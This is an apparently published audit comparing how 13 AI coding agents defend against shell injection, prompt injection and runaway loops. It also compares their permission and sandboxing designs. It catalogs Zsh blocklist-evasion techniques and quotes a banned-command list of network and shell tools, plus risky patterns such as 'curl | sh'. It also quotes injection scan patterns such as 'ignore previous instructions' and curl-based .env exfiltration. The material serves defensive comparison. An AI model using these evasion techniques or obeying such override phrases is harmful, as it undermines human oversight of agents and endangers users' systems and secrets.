The Security Audit: How Agents Defend Themselves
When you give an AI agent shell access to your machine, you're trusting it with enormous power. This page audits every security mechanism found across the 13 agents compared below, from tree-sitter AST analysis to supply-chain verification.
Security spectrum overview
These agents span an enormous range of security investment. At one end, some agents treat shell access as a trusted operation with minimal guards. At the other, agents implement tree-sitter AST parsing, Zsh attack catalogs, quote-aware pipeline parsers, and binary provenance verification.
| Agent | Shell Security | Prompt Injection | Permissions | Sandboxing | Loop Detection |
|---|---|---|---|---|---|
| Claude Code | Tree-sitter AST + Zsh catalog | Feature-gated scanning | 4 modes + ML classifier + wildcard rules | Optional sandbox routing | State machine transitions |
| Neovate | 22-item ban list + quote-aware parser | — | 3 approval modes | — | — |
| Codex | execpolicy crate + is_known_safe_command() | — | request_permissions tool + config.toml overrides | Seatbelt/bwrap/restricted tokens | — |
| Hermes | Tirith binary + cosign provenance | Context + memory scanning | Child agent tool stripping | 6 backends incl. Docker | Trajectory tracking |
| Crush | Product-level permission gates | — | TUI permission prompts | — | SHA-256 signature hashing |
| DeerFlow | Guardrail middleware | — | Tool group filtering | Docker/Local/K8s | 200-line bucketing |
| OpenHands | Risk-level attributes | Security risk assessment template | RISK_LEVELS dict | Docker per-session | Temperature bumping |
| Qwen Code | Read-only detection + classification | — | Permission decisions | — | LoopDetected event type |
| Pochi | Foreground/background separation | — | Apply-diff safety params | — | Exponential backoff retry |
| Kimi CLI | Protocol-aware terminal | — | Hooks-based interception | — | — |
| Mux | Workspace isolation | — | Regex tool allow/deny | 7 runtime backends | — |
| Pi Mono | Extension-based only | — | Via extensions only | Container-recommended (user's responsibility) | — |
| Dirac | DIRAC_COMMAND_PERMISSIONS glob patterns | — | Approval-based workflow + YOLO mode (auto-approve) | Git checkpoints (revert before risky ops) | Exponential backoff (2s, 4s, 8s) |
Shell injection defense: the full spectrum
1. Claude Code — Tree-sitter AST analysis (23-point validation)
Claude Code's bashSecurity.ts is the deepest shell security
implementation in this set. It imports tree-sitter's shell grammar to parse
command ASTs before execution — operating on the actual parsed structure,
not regex approximations.
| Attack Vector | What It Does | Detection Method |
|---|---|---|
| zmodload | Loads Zsh modules (zsh/system for raw FD access, zsh/net/tcp for sockets) | Command prefix match via Set (O(1)) |
| emulate -c 'code' | Evaluates code in an emulated environment, effectively eval | Flag pattern match |
| sysopen/sysread/syswrite | Low-level FD ops from the zsh/system module that bypass normal I/O | Command name match |
| =cmd (EQUALS expansion) | =curl → /usr/bin/curl, bypassing blocklists | AST token shape detection |
| <() / >() / =() | Process substitution creates FIFOs that execute as arguments | AST subtree match |
| $() / backticks | Command substitution, detected via tree-sitter rather than regex | AST node type |
| zpty | Zsh pseudo-terminal module for interactive command automation | Command prefix match |
| zsocket | Zsh socket module for network connections | Command prefix match |
| zf_* | Zsh filesystem primitives (zf_mv, zf_rm, zf_mkdir, etc.) | Command prefix wildcard |
| Heredoc-in-substitution | Pattern $\(.*<< (a heredoc inside a command substitution) | Regex + AST cross-check |
| <# | PowerShell-style comment opener; flags context confusion | Token match ("defense in depth against future changes") |
| IFS injection | Manipulating Internal Field Separator to split commands differently | Environment variable scanning |
| Unicode whitespace | Zero-width or unusual Unicode space characters bypassing blocklists | Unicode character detection |
| Control characters | Hidden control chars in command strings | Control character detection |
| Quote manipulation | Malformed quotes breaking parser assumptions | Malformed token detection |
| Heredoc injection | Injecting commands via heredoc delimiters | Heredoc parsing + validation |
| Git commit substitution | Attacks via git commit message templates | Git-specific validation |
The ZSH_DANGEROUS_COMMANDS constant is a JavaScript
Set for O(1) lookup. The code comments explicitly state
"defense in depth against future changes" — this is security engineering
that anticipates novel attack vectors that don't exist yet.
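The Set-based lookup can be illustrated with a minimal Python sketch. It is a token-level stand-in rather than the tree-sitter AST analysis described above, and the set contents, the prefix tuple, and the function names are assumptions made for illustration, not Claude Code's actual constants.

```python
import shlex

# Hypothetical subset of a Zsh deny-set; the real ZSH_DANGEROUS_COMMANDS
# contents are not reproduced here.
ZSH_DANGEROUS_COMMANDS = frozenset(
    {"zmodload", "emulate", "sysopen", "sysread", "syswrite", "zpty", "zsocket"}
)
ZSH_DANGEROUS_PREFIXES = ("zf_",)  # covers zf_mv, zf_rm, zf_mkdir, ...


def command_name(command):
    """Return the first word, "" for an empty command, None if untokenizable."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # e.g. unbalanced quotes
        return None
    return tokens[0] if tokens else ""


def is_dangerous_zsh_command(command):
    name = command_name(command)
    if name is None:
        return True  # fail closed when the command cannot be tokenized
    if name in ZSH_DANGEROUS_COMMANDS:  # average-case O(1) hash lookup
        return True
    if name.startswith(ZSH_DANGEROUS_PREFIXES):
        return True
    # "=curl" style EQUALS expansion: a leading "=" followed by a name.
    return len(name) > 1 and name.startswith("=")
```

Only the command position is checked, so `echo zmodload` passes while `zmodload zsh/net/tcp` is rejected. Catching the same names inside substitutions or pipelines is where a real parser becomes necessary.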
2. Neovate Code — 22-item banned list + quote-aware pipeline parser
Neovate's src/tools/bash.ts uses a character-level state
machine to handle quoting correctly before any security check. This matters
because naive regex approaches fail on quoted strings:
// State machine tracks: inSingleQuote, inDoubleQuote, escaping
// splitPipelineSegments() respects quoting so 'echo "a|b"' is ONE segment
// hasCommandSubstitution() tracks same states to find $() and backticks
The full banned command list (22 items):
alias, aria2c, axel, bash, chrome, curl, curlie, eval,
firefox, fish, http-prompt, httpie, links, lynx, nc,
rm, safari, sh, source, telnet, w3m, wget, xh, zsh
Beyond static bans, it detects high-risk patterns like rm -rf,
sudo, dd if=, mkfs, and
curl | sh, checking every pipeline segment individually.
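A quote-aware splitter of the kind described above can be sketched in Python as follows. This is an illustrative reimplementation under stated assumptions, not Neovate's code: the function names are hypothetical, the ban list is a small subset, and only the first word of each segment is checked.

```python
BANNED = frozenset({"curl", "wget", "nc", "eval", "rm"})  # illustrative subset


def split_pipeline_segments(command):
    """Split on unquoted '|' while tracking quote and escape state."""
    segments, current = [], []
    in_single = in_double = escaping = False
    for ch in command:
        if escaping:                          # previous char was a backslash
            current.append(ch)
            escaping = False
        elif ch == "\\" and not in_single:    # backslash is literal in '...'
            current.append(ch)
            escaping = True
        elif ch == "'" and not in_double:
            in_single = not in_single
            current.append(ch)
        elif ch == '"' and not in_single:
            in_double = not in_double
            current.append(ch)
        elif ch == "|" and not in_single and not in_double:
            segments.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    segments.append("".join(current).strip())
    return [s for s in segments if s]         # drops the empty piece from "||"


def banned_segments(command):
    """Return the pipeline segments whose first word is on the ban list."""
    hits = []
    for segment in split_pipeline_segments(command):
        words = segment.split()
        if words and words[0] in BANNED:
            hits.append(segment)
    return hits
```

With this splitter, `echo "curl | sh"` stays a single harmless segment, while `cat install.sh | curl -d @- http://example.com` yields a second segment that starts with a banned command.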
3. Codex — execpolicy rule DSL + safe command allowlist
Codex implements shell security through its execpolicy crate,
which provides a rule DSL for fine-grained command control. The policy system
supports prefix patterns, network rules, and command whitelists/blacklists.
A fast-path is_known_safe_command() allowlist short-circuits
common read-only operations like ls, cat, and
find without hitting the full policy engine.
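The fast-path idea can be sketched as an allowlist check that runs before a slower rule scan. The Python below is a rough illustration only: the allowlist contents, the prefix rules, the decision names, and the special handling of `find` flags are all assumptions and do not reproduce the execpolicy DSL or the real is_known_safe_command().

```python
import shlex

# Illustrative allowlist of read-only commands (assumed, not Codex's list).
KNOWN_SAFE = frozenset({"ls", "cat", "find", "pwd"})
# find stops being read-only once it can run or delete things (assumed rule).
UNSAFE_FIND_FLAGS = frozenset({"-exec", "-execdir", "-ok", "-okdir", "-delete"})
# Hypothetical prefix rules, first match wins: (argv prefix, decision).
PREFIX_RULES = [
    (("git", "status"), "allow"),
    (("git", "push"), "prompt"),
    (("rm",), "forbid"),
]


def decide(command):
    """Return "allow", "prompt", or "forbid" for a shell command string."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return "prompt"  # cannot tokenize: ask the user
    if not argv:
        return "prompt"
    # Fast path: known read-only commands skip the rule scan entirely.
    if argv[0] in KNOWN_SAFE:
        if not (argv[0] == "find" and UNSAFE_FIND_FLAGS & set(argv)):
            return "allow"
    for prefix, decision in PREFIX_RULES:
        if tuple(argv[: len(prefix)]) == prefix:
            return decision
    return "prompt"  # default when nothing matches
```

Defaulting to "prompt" rather than "allow" keeps unknown commands behind the approval flow, which matches the escalation model described in this section.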
Sandboxing varies by platform: macOS uses Seatbelt
(sandbox-exec) with a workspace-write profile
that keeps .git and .codex read-only;
Linux uses bubblewrap (prefers system bwrap,
vendored Landlock fallback); Windows uses restricted
tokens with split-filesystem policies. The CLI exposes
codex sandbox {macos,linux,windows} for testing, plus a
--sandbox flag with levels: read-only,
workspace-write, and danger-full-access.
The shell backend uses zsh-fork on macOS for safe shell
spawning, with classic Unix escalation elsewhere. Permission escalation
flows through the request_permissions tool with a runtime
approval flow, and MCP tool approvals can be overridden per-tool in
config.toml. The codebase enforces strict clippy denies
across 70+ crates: unwrap_used, expect_used,
needless_borrow, and more.
4. Hermes — Supply-chain verification via Tirith + cosign
Hermes takes a completely different approach: rather than blocking specific commands, it verifies the execution environment. The Tirith security binary is downloaded from GitHub releases with SHA-256 hash verification and optional cosign provenance validation.
This is supply-chain security — verifying that the execution binary is authentic and untampered — not just command blocking. The Tirith binary checks for:
- Homograph URLs (lookalike domains for phishing)
- Pipe-to-interpreter patterns
- Terminal injection attempts
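The hash-verification half of this approach is straightforward to sketch with the Python standard library. The function names are hypothetical and the cosign provenance step is not shown; this covers only the SHA-256 comparison against a published digest.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_of(path, chunk_size=1 << 16):
    """Stream the file through SHA-256 so large binaries are not loaded whole."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_binary(path, expected_hex):
    """Return True only if the file's digest matches the published one."""
    expected = expected_hex.strip().lower()
    # compare_digest performs a constant-time comparison of the two strings.
    return hmac.compare_digest(sha256_of(path), expected)
```

A caller would refuse to execute the downloaded binary whenever `verify_binary` returns False. The expected digest has to come from a channel the attacker does not control, which is the gap that provenance attestation is meant to close.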
5. Crush — TUI permission gates + SHA-256 loop detection
Crush integrates a permission system directly into its TUI. Before executing dangerous operations, the user sees a permission prompt. This is a UX-level defense — appropriate for an interactive tool where the user is present.
The SHA-256 loop detection in internal/agent/loop_detection.go
computes a signature by hashing tool_name + "\x00" + input + "\x00" + output
for every tool call. If any signature appears more than 5 times in the last
10 steps, the agent halts.
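The signature-and-window scheme described above can be sketched in Python. Crush's implementation is in Go, so this is an illustrative translation under assumptions: the class and constant names are hypothetical, and only the thresholds (more than 5 repeats in the last 10 steps) come from the description.

```python
import hashlib
from collections import deque

WINDOW = 10       # number of recent steps remembered
MAX_REPEATS = 5   # halt once a signature appears more than this many times


def signature(tool_name, tool_input, tool_output):
    """Hash tool_name + "\\x00" + input + "\\x00" + output."""
    payload = "\x00".join((tool_name, tool_input, tool_output))
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


class LoopDetector:
    def __init__(self, window=WINDOW, max_repeats=MAX_REPEATS):
        self.recent = deque(maxlen=window)  # old signatures fall off the left
        self.max_repeats = max_repeats

    def record(self, tool_name, tool_input, tool_output):
        """Record one step; return True when the agent looks stuck."""
        sig = signature(tool_name, tool_input, tool_output)
        self.recent.append(sig)
        return self.recent.count(sig) > self.max_repeats
```

The NUL separator keeps field boundaries unambiguous, so the pairs ("ab", "c") and ("a", "bc") cannot collide by concatenation alone.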
Prompt injection defense
Prompt injection — tricking the agent via crafted input in files, context, or memory — is a growing attack vector. Only two agents in this set have explicit defense:
Hermes — Two-layer injection scanning
Layer 1: Context file scanning — Before injecting context files (AGENTS.md, .cursorrules, SOUL.md) into the system prompt, Hermes scans for:
- "ignore previous instructions" / "system prompt override"
- "do not tell the user" (deception instructions)
- "act as if you have no restrictions" (bypass attempts)
- <!-- ignore --> (hidden HTML comment injection)
- Zero-width spaces and bidi override characters
- Credential exfiltration via curl on .env
Layer 2: Memory injection scanning — MEMORY.md and USER.md go through the same scanner before loading. This matters because memory persists across sessions — a successful injection in session A would propagate to session B without this scan.
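A pattern scanner covering the categories listed above might look like the following Python sketch. The regular expressions and category names are assumptions written for illustration, not Hermes's actual rules, and the HTML-comment pattern is deliberately broad (it flags every comment).

```python
import re

# Hypothetical patterns, one per category named in the list above.
INJECTION_PATTERNS = {
    "override": re.compile(
        r"ignore\s+(all\s+)?previous\s+instructions|system\s+prompt\s+override",
        re.I,
    ),
    "deception": re.compile(r"do\s+not\s+tell\s+the\s+user", re.I),
    "bypass": re.compile(r"act\s+as\s+if\s+you\s+have\s+no\s+restrictions", re.I),
    "hidden_html_comment": re.compile(r"<!--.*?-->", re.S),
    # Zero-width characters plus bidi embedding/override/isolate controls.
    "invisible_unicode": re.compile(
        "[\u200b\u200c\u200d\u2060\ufeff\u202a-\u202e\u2066-\u2069]"
    ),
    "env_exfiltration": re.compile(r"curl\b[^\n]*\.env\b", re.I),
}


def scan(text):
    """Return the sorted names of every category that matches the text."""
    return sorted(
        name for name, pattern in INJECTION_PATTERNS.items() if pattern.search(text)
    )
```

Running the same `scan` over both context files and memory files before they reach the prompt mirrors the two-layer design: one scanner, two load paths.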
OpenHands — Security risk assessment template
OpenHands includes a composable Jinja2 sub-template
security_risk_assessment.j2 that's included in the main
system prompt. All tool calls carry a security_risk
attribute validated against a RISK_LEVELS dictionary.
This is more of a risk-classification system than an injection defense, but it provides auditability: every action is classified and the agent is explicitly warned about security risk in its system prompt.
Permission systems compared
How agents decide whether to run a command is a fundamental security question. The approaches vary dramatically:
| Agent | Permission Model | Granularity |
|---|---|---|
| Claude Code | 4 modes: default (prompt), plan (show plan, ask once), bypassPermissions (auto-approve), auto (ML classifier) | Per-operation + wildcard rules: Bash(git *), FileEdit(/src/*) |
| Neovate | 3 modes: default (prompt), autoEdit (auto-approve edits), yolo (approve all) | Per-tool category: read, write, command, network, ask |
| Codex | request_permissions tool with runtime approval flow + per-tool config.toml overrides | execpolicy rule DSL: prefix patterns, network rules, command whitelists/blacklists |
| Crush | TUI permission prompts before dangerous operations | Per-operation, user-present |
| DeerFlow | Tool group filtering + guardrail middleware (fail-closed by default) | Per-tool-group: web, file:read, file:write, bash |
| Mux | Regex tool allow/deny patterns per agent | Per-agent, regex-based: -.*, -file_edit_.* |
| Qwen Code | Permission decisions and shell classification | Per-tool, read-only detection |
| Hermes | Child agent tool stripping (5 tools always removed from children) | Per-agent-type: parent vs child |
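Wildcard rules such as Bash(git *) and FileEdit(/src/*) can be modeled as a tool name plus a glob over the tool's argument. The Python sketch below is an assumption about how such rules could be evaluated, using the standard fnmatch module; it is not Claude Code's matcher, and the function names are hypothetical.

```python
import re
from fnmatch import fnmatchcase

# Parses "Tool(pattern)" into its two parts.
RULE_RE = re.compile(r"^(?P<tool>\w+)\((?P<pattern>.*)\)$")


def parse_rule(rule):
    match = RULE_RE.match(rule)
    if match is None:
        raise ValueError(f"malformed rule: {rule!r}")
    return match["tool"], match["pattern"]


def is_allowed(tool, argument, rules):
    """Return True if any rule for this tool glob-matches the argument."""
    for rule in rules:
        rule_tool, pattern = parse_rule(rule)
        if rule_tool == tool and fnmatchcase(argument, pattern):
            return True
    return False
```

Given the rules `["Bash(git *)", "FileEdit(/src/*)"]`, the call `is_allowed("Bash", "git status", rules)` returns True and `is_allowed("Bash", "rm -rf /", rules)` returns False. A plain glob also accepts `git status; rm -rf /`, which is one reason wildcard rules are usually paired with the structural shell parsing covered earlier.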
Sandboxing and execution isolation
When things go wrong, how contained is the damage? The agents fall into three camps:
Strong isolation (Docker/container-based)
- OpenHands — Docker container per session, torn down on exit
- DeerFlow — AioSandboxProvider with Docker, Apple Container, or K8s backends
- Hermes — 6 backends: local, Docker, SSH, Daytona, Modal, Singularity
Moderate isolation (workspace/runtime-based)
- Mux — 7 runtime backends including devcontainer, Docker, worktree, SSH, remote
- Claude Code — Optional sandbox routing, git worktree isolation
- Codex — Platform sandboxes: macOS Seatbelt, Linux bwrap/Landlock, Windows restricted tokens
Host execution (permission-based guards only)
- Neovate — Host execution with approval gates and banned command lists
- Crush — Host execution with TUI permission prompts
- Qwen Code — Host execution with classification
- Pochi — Host execution with foreground/background separation
- Kimi CLI — Host execution with protocol-aware handling
- Pi Mono — Host execution with no built-in guards. The README explicitly states: "No permission popups. Run in a container, or build your own confirmation flow with extensions."
Loop detection as a safety mechanism
Infinite loops aren't just annoying: they can burn through API credits, fill disks with logs, or repeatedly execute destructive commands. Three agents implement dedicated repetition detectors, detailed below; the rest rely on retry backoff, loop event types, the model noticing repetition, or max-iteration caps.
| Agent | Method | Threshold | Action |
|---|---|---|---|
| Crush | SHA-256(tool_name + input + output) over last 10 steps | >5 repeats in 10-step window | Halt agent as stuck |
| DeerFlow | Hash with 200-line bucketing for read_file, full arg hash for write/str_replace | 3 warns, 5 hard stop | Warn at 3, strip tool_calls at 5 (forces text output) |
| Hermes | Trajectory tracking + summary convergence detection | Diminishing new information | RL training signal; proxy for being stuck |
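DeerFlow's bucketing row can be made concrete with a short Python sketch. The argument names (path, start_line), the class name, and the returned labels are assumptions; only the 200-line bucket size and the warn-at-3, stop-at-5 thresholds come from the table.

```python
import hashlib
import json
from collections import Counter

BUCKET_LINES = 200
WARN_AT, STOP_AT = 3, 5


def call_key(tool, args):
    """Hash a tool call; read_file calls are coarsened to 200-line buckets."""
    if tool == "read_file":
        # Reads starting in the same bucket of the same file share a key.
        normalized = {
            "path": args.get("path"),
            "bucket": args.get("start_line", 0) // BUCKET_LINES,
        }
    else:
        normalized = args  # write/str_replace: hash the full arguments
    blob = json.dumps([tool, normalized], sort_keys=True)
    return hashlib.sha256(blob.encode("utf-8")).hexdigest()


class RepeatTracker:
    def __init__(self):
        self.counts = Counter()

    def observe(self, tool, args):
        """Return "ok", "warn" (3rd and 4th repeat), or "stop" (5th onward)."""
        key = call_key(tool, args)
        self.counts[key] += 1
        seen = self.counts[key]
        if seen >= STOP_AT:
            return "stop"
        if seen >= WARN_AT:
            return "warn"
        return "ok"
```

Bucketing means an agent that keeps re-reading the same region with slightly different offsets still counts as repeating, while a read that moves to the next 200-line bucket starts a fresh count.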
Why Crush's approach is the most robust
Calling the same tool with different arguments produces a different hash. Calling it with the same arguments but getting different output (e.g., from a flaky command) also produces a different hash. Only genuine repetition, where tool, input, and output all match, triggers the halt. This avoids false positives from legitimate iterative workflows like "read file, edit, read again to verify."
Security verdicts
🏆 Best shell security: Claude Code
Tree-sitter AST parsing, 23-point Zsh attack catalog, O(1) Set lookups, and explicit "defense in depth against future changes" comments. This is security engineering that anticipates attack vectors that don't exist yet.
🏆 Best pre-execution safety: Neovate Code
22-item banned list, quote-aware pipeline parser, high-risk pattern detection per pipeline segment. The most opinionated bash safety in this set — stops dangerous commands before they ever run.
🏆 Best supply-chain security: Hermes
SHA-256 binary verification + cosign provenance attestation. This is the only agent that verifies the execution binary's authenticity and integrity before running.
🏆 Best execution isolation: OpenHands
Docker container per session is the strongest isolation model in this set. The agent runs inside a container, not on your host machine. Files sync back, but processes can't escape.
🏆 Best prompt injection defense: Hermes
Two-layer scanning (context files + memory) with 6+ pattern categories. The memory layer is critical: it prevents cross-session injection propagation.
🏆 Best loop detection: Crush
SHA-256 signature hashing over tool_name + input + output with a 10-step sliding window. Legitimate iterative workflows produce different signatures at each step, so they do not trip the detector.
What most agents are missing
Several security patterns appear in only one or two agents despite being broadly applicable:
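- Prompt injection scanning — Only Hermes scans context files for injection patterns. Claude Code's scanning is feature-gated, OpenHands classifies risk rather than scanning input, and the remaining agents (including Pi Mono and Qwen Code) trust context files blindly.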
- Cross-session memory scanning — Only Hermes scans memory on load to prevent injection propagation.
- Supply-chain verification — Only Hermes verifies binary provenance.
- Tree-sitter AST parsing — Only Claude Code parses shell commands structurally rather than with regex.
- Quote-aware parsing — Only Neovate correctly handles quoting in pipeline segmentation.
- Temperature-adaptive retry — Only OpenHands bumps temperature on deterministic failures.
- Agent-requested compression — Only OpenHands lets the agent ask for context condensation.
- File mutation queues — Only Pi Mono serializes concurrent writes to the same file, preventing a subtle race condition that affects most other agents.
- Differential TUI rendering — Only Pi Mono redraws just the terminal cells that changed, reducing the attack surface from terminal escape sequence flooding.
Bottom line
The hallmark of a production-ready coding agent is not its prompt engineering, but its deterministic security scaffold. Claude Code and OpenHands represent the bleeding edge of different philosophies: Claude Code builds walls on the host machine, while OpenHands isolates execution in containers.
Meanwhile, several agents (Pochi, Kimi CLI, Mux) rely primarily on trust and approval workflows rather than active defense mechanisms. This isn't necessarily wrong — for trusted environments, minimal friction is a feature — but it matters enormously when deploying agents on production infrastructure.